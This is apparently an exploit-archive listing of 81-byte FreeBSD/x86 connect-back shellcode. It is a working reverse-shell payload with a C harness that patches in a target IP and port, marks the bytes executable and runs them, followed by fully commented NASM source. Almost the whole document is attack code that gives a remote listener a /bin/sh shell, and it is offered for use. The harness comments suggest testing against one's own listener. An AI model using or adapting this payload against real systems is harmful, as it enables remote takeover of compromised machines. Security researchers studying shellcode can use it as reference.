
# Title : BSD x86 connect back Shellcode (81 bytes)
# Published : 2011-01-21
# Author : Tosh (per the listing header below)


/*
 -------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ----------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */

#include <sys/mman.h>
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

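/*
 * Raw FreeBSD/i386 connect-back payload (81 bytes, no NUL bytes).
 * Offsets 15..18 are the immediate of "push 0x0100007f" (target IPv4
 * address) and offsets 21..22 the immediate of "push word 0x3905" (port in
 * network byte order); change_shellcode() patches both in place, so the
 * array must stay writable. The listing is the NASM source at the end of
 * the file.
 */
char shellcode [] = "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2"
                    "\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x68\x01\x02\x89"
                    "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9"
                    "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03"
                    "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                    "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";

/*
 * Patch the connect-back target into the payload.
 *
 * ip   - IPv4 address in dotted-quad form, e.g. "10.0.0.5"
 *        (inet_pton is stricter than inet_addr: short forms like "127.1"
 *        are rejected)
 * port - TCP port in host byte order
 *
 * Returns 0 on success, -1 if `ip` is NULL or does not parse; the payload
 * is left untouched on failure.
 *
 * The previous version stored inet_addr() through an `unsigned long *`.
 * On LP64 targets that writes 8 bytes and clobbers the "\x66\x68" opcode
 * bytes of the port push at offsets 19..20, breaking the payload. Copying
 * exactly 4 and 2 bytes with memcpy also avoids the unaligned, aliasing
 * stores.
 */
int change_shellcode(const char *ip, unsigned short port)
{
   enum { IP_OFFSET = 15, PORT_OFFSET = 21 };
   struct in_addr addr;
   unsigned short nport;

   if (ip == NULL || inet_pton(AF_INET, ip, &addr) != 1)
      return -1;

   nport = htons(port);
   memcpy(shellcode + IP_OFFSET, &addr.s_addr, sizeof addr.s_addr); /* 4 bytes */
   memcpy(shellcode + PORT_OFFSET, &nport, sizeof nport);           /* 2 bytes */
   return 0;
}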
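/*
 * Dump the (possibly patched) payload to stdout as a C-style "\xNN" string
 * on one line, followed by a newline. Output only; no return value.
 *
 * The format must be "\\x%.2x": with a single backslash, "\x%" is an
 * invalid hex escape instead of the two literal characters '\' 'x'.
 */
void print_shellcode(void)
{
   size_t i;
   const size_t len = sizeof(shellcode) - 1;   /* drop the terminating NUL */

   for (i = 0; i < len; i++)
      printf("\\x%.2x", (unsigned char)shellcode[i]);
   putchar('\n');
}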
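/*
 * Test harness: patch the payload for IP:PORT, print it, then jump into it.
 *
 * The payload lives in .data, which modern kernels map non-executable, so
 * the page(s) holding it are remapped RWX with mprotect() first; without
 * that the indirect call faults. Executing it turns THIS process into a
 * reverse shell to IP:PORT (stdio dup2'd onto the socket, then execve of
 * /bin/sh) -- only run it against a listener you control, e.g. `nc -l 1337`.
 * f() does not return when execve succeeds; it returns only if the payload
 * fails along the way.
 */
int main(void)
{
   const char ip[] = "127.0.0.1";
   unsigned short port = 1337;
   long pagesize;
   uintptr_t start, end;
   void (*f)(void);

   change_shellcode(ip, port);
   print_shellcode();
   printf("Shellcode len = %u bytes\n", (unsigned)(sizeof(shellcode) - 1));

   pagesize = sysconf(_SC_PAGESIZE);
   if (pagesize <= 0) {
      perror("sysconf");
      return 1;
   }
   /* Round the payload's span out to page boundaries; it may straddle two pages. */
   start = (uintptr_t)shellcode & ~((uintptr_t)pagesize - 1);
   end = ((uintptr_t)shellcode + sizeof(shellcode) + (uintptr_t)pagesize - 1)
         & ~((uintptr_t)pagesize - 1);
   if (mprotect((void *)start, (size_t)(end - start),
                PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
      perror("mprotect");
      return 1;
   }

   f = (void (*)(void))(void *)shellcode;
   f();

   return 0;
}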

/*
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; NASM, Intel syntax, FreeBSD/i386 int 0x80 ABI: syscall number in eax,  ;
; arguments on the stack above a dummy 4-byte "return address" slot.     ;
; Syscall numbers from /usr/src/sys/kern/syscalls.master.                ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

%define IPPROTO_TCP 6
%define SOCK_STREAM 1
%define AF_INET 2

%define SYS_EXECV 59     ; syscall 59 is execve(2) on FreeBSD; name kept as used below
%define SYS_DUP2 90
%define SYS_SOCKET 97
%define SYS_CONNECT 98

section .text

global _start

_start:
   xor eax, eax
   ;;;;;;;;;;;;;;;;;;;;;;
   ; socket()
   ;;;;;;;;;;;;;;;;;;;;;;
   push eax                ; protocol = 0 (IPPROTO_TCP is defined above but unused)
   push byte SOCK_STREAM
   push byte AF_INET

   mov al, SYS_SOCKET
   push eax                ; fills the dummy return-address slot int 0x80 expects
   int 0x80                ; eax = socket(AF_INET, SOCK_STREAM, 0); result unchecked
   mov edx, eax            ; edx = socket fd, reused by connect() and dup2() below

   ;;;;;;;;;;;;;;;;;;;;;;
   ; sockaddr_in
   ;;;;;;;;;;;;;;;;;;;;;;
   push 0x0100007f         ; sin_addr = 127.0.0.1 (the C harness patches offset 15)
   push word 0x3905        ; sin_port = htons(1337)  (the C harness patches offset 21)
   push word 0x0201        ; sin_len = 1, sin_family = AF_INET (BSD sockaddr layout)
   mov ecx, esp            ; ecx = &sockaddr_in; only 8 bytes were pushed, so sin_zero
                           ; is whatever the socket() arguments left on the stack

   ;;;;;;;;;;;;;;;;;;;;;
   ; connect()
   ;;;;;;;;;;;;;;;;;;;;;
   push byte 16            ; addrlen = sizeof(struct sockaddr_in)
   push ecx                ; &sockaddr_in
   push edx                ; socket fd
   xor eax, eax
   mov al, SYS_CONNECT
   push eax                ; dummy return-address slot
   int 0x80                ; connect(fd, &sa, 16); failure is ignored -- the shell
                           ; is still spawned, with its stdio on the dead socket

   ;;;;;;;;;;;;;;;;;;;;;
   ; dup2()
   ;;;;;;;;;;;;;;;;;;;;;
   xor ecx, ecx            ; ecx = fd being replaced: 0, 1, 2
.L:
   push ecx                ; newfd
   push edx                ; oldfd = socket (relies on the kernel leaving edx
                           ; intact across each int 0x80)
   xor eax, eax
   mov al, SYS_DUP2
   push eax                ; dummy return-address slot
   int 0x80                ; dup2(sock, ecx)

   inc cl                  ; the 3 pushes per iteration are never popped; harmless here
   cmp cl, 3               ; done once stdin, stdout and stderr are redirected
   jne .L

   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   ; execve("/bin//sh", argv, envp)  (syscall 59 is execve)
   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   xor eax, eax

   push eax                ; NUL terminator for the path string

   push '//sh'             ; "/bin//sh": the doubled slash pads the path to exactly
   push '/bin'             ; 8 bytes so no NUL byte has to appear in the payload

   mov ebx, esp            ; ebx = "/bin//sh"

   push eax                ; NULL; read both as argv[0] (via the push esp below)
                           ; and as the envp argument at [esp+12] after the next pushes
   push esp                ; argv = pointer to that NULL
   push ebx                ; path
   mov al, SYS_EXECV
   push eax                ; dummy return-address slot
   int 0x80                ; execve(path, argv, envp); returns only on failure
 */